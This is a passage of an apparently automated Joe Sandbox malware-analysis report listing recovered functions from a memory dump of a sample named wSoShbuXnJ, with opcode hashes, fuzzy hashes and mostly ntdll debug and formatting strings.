                                                              • Instruction Fuzzy Hash: 7390023320141402D10075D854096460085A7E1311F59D411E5024959ECBA589916231
                                                              Function 01512F60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d551f0a5bb2dde76accb0a70579038c019ffb8c97e9f723b0f425ea68a15b6c5
                                                              • Instruction ID: 574f0ca0148b53d2670e137c93dffc5d2a9f3319b9bef96fddec5f557fcb4206
                                                              • Opcode Fuzzy Hash: d551f0a5bb2dde76accb0a70579038c019ffb8c97e9f723b0f425ea68a15b6c5
                                                              • Instruction Fuzzy Hash: AF90026321141042D1047198440570600C5A7E2211F59C412E2154958CCA698D615225
                                                              Function 01512F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ab2421e40a81132ce772976e22fd60200149bfe63836fa4a39e9f0047c57fce9
                                                              • Instruction ID: 9b65ecf60f4fb5a72a34da3bf0abe7d4619712ffb29f938ee0c7dbf85a8bf68d
                                                              • Opcode Fuzzy Hash: ab2421e40a81132ce772976e22fd60200149bfe63836fa4a39e9f0047c57fce9
                                                              • Instruction Fuzzy Hash: 7190026334141442D10071984415B060085E7E2311F59C415E1064958DCB59CD526226
                                                              Function 01512FE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dda4bd88104c444c3cbbccb85acd921baf310b290a71a809a1862121baf5fd3d
                                                              • Instruction ID: 518402df4ad28a8840d32812ff2b1f3908af46899651a2de74807f4714d04f95
                                                              • Opcode Fuzzy Hash: dda4bd88104c444c3cbbccb85acd921baf310b290a71a809a1862121baf5fd3d
                                                              • Instruction Fuzzy Hash: B4900223211C1042D20075A84C15B070085A7D1313F59C515E0154958CCE5589615621
                                                              Function 01512F90 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b134a5cf5b16a02ef2ddcc3bf4fade5ad7d7734b63b96151888bc9bd7c9e231d
                                                              • Instruction ID: 8839481735dabfb8476652012f7b39606a6bd4a490fbf8ba19206235e218a0be
                                                              • Opcode Fuzzy Hash: b134a5cf5b16a02ef2ddcc3bf4fade5ad7d7734b63b96151888bc9bd7c9e231d
                                                              • Instruction Fuzzy Hash: 9D90023320181402D1007198481570B0085A7D1312F59C411E1164959DCB6589516671
                                                              Function 01512FB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08b672b343074c61bab34807d7475082e2551e61cde5c2d46dea017cc1d723fd
                                                              • Instruction ID: 88509111300c38b2486eb8eb7f56e35da5265c8663701231a5e0d91c5f2c7277
                                                              • Opcode Fuzzy Hash: 08b672b343074c61bab34807d7475082e2551e61cde5c2d46dea017cc1d723fd
                                                              • Instruction Fuzzy Hash: 1A90022360141042414071A888459064085BBE2221759C521E0998954DCA9989655765
                                                              Function 01512FA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0eed99ac9e6d8770a86fd35301422b53449241dca3466ce03c8a2b7ef56caff8
                                                              • Instruction ID: cd6876d233b378e44b0cdd923cb8550d25da38bca0b8c8bae8cec5e5e6d14868
                                                              • Opcode Fuzzy Hash: 0eed99ac9e6d8770a86fd35301422b53449241dca3466ce03c8a2b7ef56caff8
                                                              • Instruction Fuzzy Hash: 3090023320181402D100719848097470085A7D1312F59C411E5164959ECBA5C9916631
                                                              Function 01512E30 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4901801a3ccfb2949781ed9b87089b987f9d246098a9624e0fdc9bb21164445c
                                                              • Instruction ID: 8981df695de63c356626e18d18b09344c35d42e53d0d22820ab0ad75257371e9
                                                              • Opcode Fuzzy Hash: 4901801a3ccfb2949781ed9b87089b987f9d246098a9624e0fdc9bb21164445c
                                                              • Instruction Fuzzy Hash: 4090022330141402D102719844156060089E7D2355F99C412E1424959DCB658A53A232
                                                              Function 01512EE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b84c8d248608d7d2d5f474b1691d7209dad22d2a6e0c593f48b920f291153f7
                                                              • Instruction ID: 91453f6d1ee95d29b3f6194c02ebcdd6de6cfebf993a043ee5395221fc73be2a
                                                              • Opcode Fuzzy Hash: 0b84c8d248608d7d2d5f474b1691d7209dad22d2a6e0c593f48b920f291153f7
                                                              • Instruction Fuzzy Hash: B390026320181403D140759848056070085A7D1312F59C411E2064959ECF698D516235
                                                              Function 01512E80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bc9c0738aae47b5c84d0dbfcf1e9d36fcd1d71be9c3ce7da715ae559bc3f11c4
                                                              • Instruction ID: 5725569e12d22f3786af2eb6c5da8f659ee489e0391ba7bdbb0cd8f6f426dd73
                                                              • Opcode Fuzzy Hash: bc9c0738aae47b5c84d0dbfcf1e9d36fcd1d71be9c3ce7da715ae559bc3f11c4
                                                              • Instruction Fuzzy Hash: 9990022360141502D10171984405616008AA7D1251F99C422E1024959ECF658A92A231
                                                              Function 01512EA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fec0db3dd4e2d2022770cf866dc84cefe6a79fdb66c8dcac9c1e006faece7d82
                                                              • Instruction ID: e4178cb921a8002e44628f6e12df5bd6817ddff951974430162ff148de8cd83b
                                                              • Opcode Fuzzy Hash: fec0db3dd4e2d2022770cf866dc84cefe6a79fdb66c8dcac9c1e006faece7d82
                                                              • Instruction Fuzzy Hash: 9090027320141402D140719844057460085A7D1311F59C411E5064958ECB998ED56765
                                                              Function 01513010 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c93b4ab5581e32160aa93c9b56da7a6378401c0a08ae7c3505e3ed0ab515026
                                                              • Instruction ID: 16b98a208c0dcfebd2fba50879025659c42a4f4227f6a6a6d592d66840dab974
                                                              • Opcode Fuzzy Hash: 6c93b4ab5581e32160aa93c9b56da7a6378401c0a08ae7c3505e3ed0ab515026
                                                              • Instruction Fuzzy Hash: 1990022320185442D14072984805B0F4185A7E2212F99C419E4156958CCE5589555721
                                                              Function 01513090 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5f19b1cf4da5d3d01df7d359a743efa1a5ae3edaadd56e9938991c4863372a4
                                                              • Instruction ID: 7a9c3833aa2b3cdff5f040154b5f5f43088a549721be31e35bf3325c6a688e3d
                                                              • Opcode Fuzzy Hash: c5f19b1cf4da5d3d01df7d359a743efa1a5ae3edaadd56e9938991c4863372a4
                                                              • Instruction Fuzzy Hash: A190022324141802D140719884157070086E7D1611F59C411E0024958DCB568A6567B1
                                                              Function 015139B0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8d291318ad4637d885bdb4cb1b064c4ac7039286c7f158ef43348aeed2c31a52
                                                              • Instruction ID: ff11fc8910e93830b548b7839b64a1a001bdc0d7afd85ae6e62de43ae0db6dac
                                                              • Opcode Fuzzy Hash: 8d291318ad4637d885bdb4cb1b064c4ac7039286c7f158ef43348aeed2c31a52
                                                              • Instruction Fuzzy Hash: EF90022324546102D150719C44056164085B7E1211F59C421E0814998DCA9589556321
                                                              Function 01513D70 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 63030dcab276916c7cd34f1704404334cfb1353637e7fbff9156d551223b6c28
                                                              • Instruction ID: 21886ffe48eefaf81f964c90c13c4986b25415866b1cb9ab49ba7703fb6c0142
                                                              • Opcode Fuzzy Hash: 63030dcab276916c7cd34f1704404334cfb1353637e7fbff9156d551223b6c28
                                                              • Instruction Fuzzy Hash: 2090023720141402D5107198580564600C6A7D1311F59D811E042495CDCB9489A1A221
                                                              Function 01513D10 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e745b328f06c6344c9a2f6ff46925ee57cc3bd750bdb1d6ba3d025a2b5c31e1
                                                              • Instruction ID: c69ac099f3c80980c13c7c95324269f60bb1ff27f97d626d914a864cf044b2cd
                                                              • Opcode Fuzzy Hash: 8e745b328f06c6344c9a2f6ff46925ee57cc3bd750bdb1d6ba3d025a2b5c31e1
                                                              • Instruction Fuzzy Hash: 1B90023320241142954072985805A4E4185A7E2312B99D815E0015958CCE5489615321
                                                              Function 01512C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: 3aa530bd9f9da46c43373b1a0acd4f4e5db6b312c331b1a8573885668b0fdd4a
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              Function 01512890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: c91673bea96281769799926cbf028d6a6402208403c978aed691629fc0c77e2a
                                                              • Instruction ID: 4d71cf93870a32284e4e170306e336cb7e6c1f891b409e8fc2fc425ce4abf445
                                                              • Opcode Fuzzy Hash: c91673bea96281769799926cbf028d6a6402208403c978aed691629fc0c77e2a
                                                              • Instruction Fuzzy Hash: B551D7B6A00216BFEB12DF9C899097EFBF8BB48240B64C129F555DB645D334DE408BE0
                                                              Function 01582410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: aa97458d6092c39f1a225a12572c782ca8f0ce6d407fbc779da3c01aba610752
                                                              • Instruction ID: 7f09cc2e5ac3dfe9c1942077c0a6c8929c37776639c540b51da3c9774ba94be5
                                                              • Opcode Fuzzy Hash: aa97458d6092c39f1a225a12572c782ca8f0ce6d407fbc779da3c01aba610752
                                                              • Instruction Fuzzy Hash: 5451F4B5A40646AEDB20EE5DC89097FBFF8BF44200F44885AE4D6EF681E674DA00C770
                                                              Function 01507630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01544742
                                                              • Execute=1, xrefs: 01544713
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01544725
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01544787
                                                              • ExecuteOptions, xrefs: 015446A0
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01544655
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015446FC
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: eebb323422904eb371951b8109a0e21761788e3305c4c8a944451843dd31414f
                                                              • Instruction ID: 74c2498aa8ab1d8cd795a21788d5c85d019b3ebdd593dda598d1dae989d098e7
                                                              • Opcode Fuzzy Hash: eebb323422904eb371951b8109a0e21761788e3305c4c8a944451843dd31414f
                                                              • Instruction Fuzzy Hash: 89514B3160020ABBEF12EAE8DC95FAD77A8BF58744F14009AD606AF1D1D770AA458F50
                                                              Function 015A6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction ID: aa30154bbe347be4fea2d10d7b53b4b234a6e2d34eb9087b16102085f7d63ba3
                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction Fuzzy Hash: FF020471548342AFD305CF28C490A6FBBE5FFC8700F84892DBA998B264DB71E945CB52
                                                              Function 0151B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: f5e176e961f0b6da425b7870111e6e4e95e77a4c474b9f3dadefdedc69d8df11
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 5081D170E0524A9EFF278E6CC8907FEBBB1BF55720F184A19D851AF299C7348840CB61
                                                              Function 015820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 4df3156c523e70c7d0f669e880d08b1eff414b02bdc27d1676c782b1271fab48
                                                              • Instruction ID: e8786bc6c5ef11444cbc83e810c3bab9418f133a1d60c9a0c69fe5c39b74707d
                                                              • Opcode Fuzzy Hash: 4df3156c523e70c7d0f669e880d08b1eff414b02bdc27d1676c782b1271fab48
                                                              • Instruction Fuzzy Hash: 5921657AA0011AABDB11EF79CC40AEE7FF8FF54644F54012AE905E7244E730D911CBA1
                                                              Function 014FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015402E7
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015402BD
                                                              • RTL: Re-Waiting, xrefs: 0154031E
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 0dbd05da6ee4db4f93009731795933cc33feff24978a441c9dc4306e6e251094
                                                              • Instruction ID: 72ba8d594e570dbccb1e3aae0c4933d82d8ca7fd677fa2a5113966577b62e800
                                                              • Opcode Fuzzy Hash: 0dbd05da6ee4db4f93009731795933cc33feff24978a441c9dc4306e6e251094
                                                              • Instruction Fuzzy Hash: 7BE1B2316087429FE725CF28C884B5ABBE0BF84714F240A5EF6A58B3E1D774D849CB42
                                                              Function 0150BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 01547B8E
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01547B7F
                                                              • RTL: Re-Waiting, xrefs: 01547BAC
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: dafdbb0a5e4d2a9b47779506ff868ac1d989d88114b05a5608e7db7d8c47d03c
                                                              • Instruction ID: 807058155cd81d3a44174f106b8b8a3c69af269eac6b63c19e3b0557252c29b0
                                                              • Opcode Fuzzy Hash: dafdbb0a5e4d2a9b47779506ff868ac1d989d88114b05a5608e7db7d8c47d03c
                                                              • Instruction Fuzzy Hash: 6141D1353007039FD726DE69C880B6AB7E5FB98710F100A1EF9669F280EB71E8058B91
                                                              Function 0150B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0154728C
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 015472A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01547294
                                                              • RTL: Re-Waiting, xrefs: 015472C1
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 246a0a955c6d90cf63a9b25c473ee9878eea87059dffc343666feb6d56c701e5
                                                              • Instruction ID: a63b01235db0345fa8c167f9d94fc83f02739ebc9e86db1ee72517f8d1716b09
                                                              • Opcode Fuzzy Hash: 246a0a955c6d90cf63a9b25c473ee9878eea87059dffc343666feb6d56c701e5
                                                              • Instruction Fuzzy Hash: 0541D035704203ABD721DE69CC81F6AB7A6FB98714F100A1AF955AF280DB71F94287E1
                                                              Function 01582300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: db90db450ae29bc39fec1cc08a9a7e794e85230b118731486fa0049416ca49d2
                                                              • Instruction ID: 107506d1d61f036fb0fe57c0eb4cf3202bdf8afb1c4346a8631a2d7d116a8fd5
                                                              • Opcode Fuzzy Hash: db90db450ae29bc39fec1cc08a9a7e794e85230b118731486fa0049416ca49d2
                                                              • Instruction Fuzzy Hash: C6315476A002199FDB20DE2DCC50BEEBBF8FF54650F94455AE949E7240EF309A44CBA0
                                                              Function 01517D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: c4743d285e126930926dd09acfa3ca83470034b349d5f8689e92f456643c011d
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: 22919471E0020A9EFB26DF6DC8806BFBBE5BF48320F54461AE965EF2C8D73499408751
                                                              Function 014D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: 563d975ca398593017bffa70d123415f38ac73c782ba5bf847ce9d60c81d691c
                                                              • Instruction ID: 9aeca95fc6eea966c6af3190808e44f1d80aa36803d58e5230bb297310d15e39
                                                              • Opcode Fuzzy Hash: 563d975ca398593017bffa70d123415f38ac73c782ba5bf847ce9d60c81d691c
                                                              • Instruction Fuzzy Hash: 59811871D006699BDB31CF54CC54BEEBBB4AF58714F0441EAAA19BB290D7709E848FA0
                                                              Function 0155CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0155CFBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
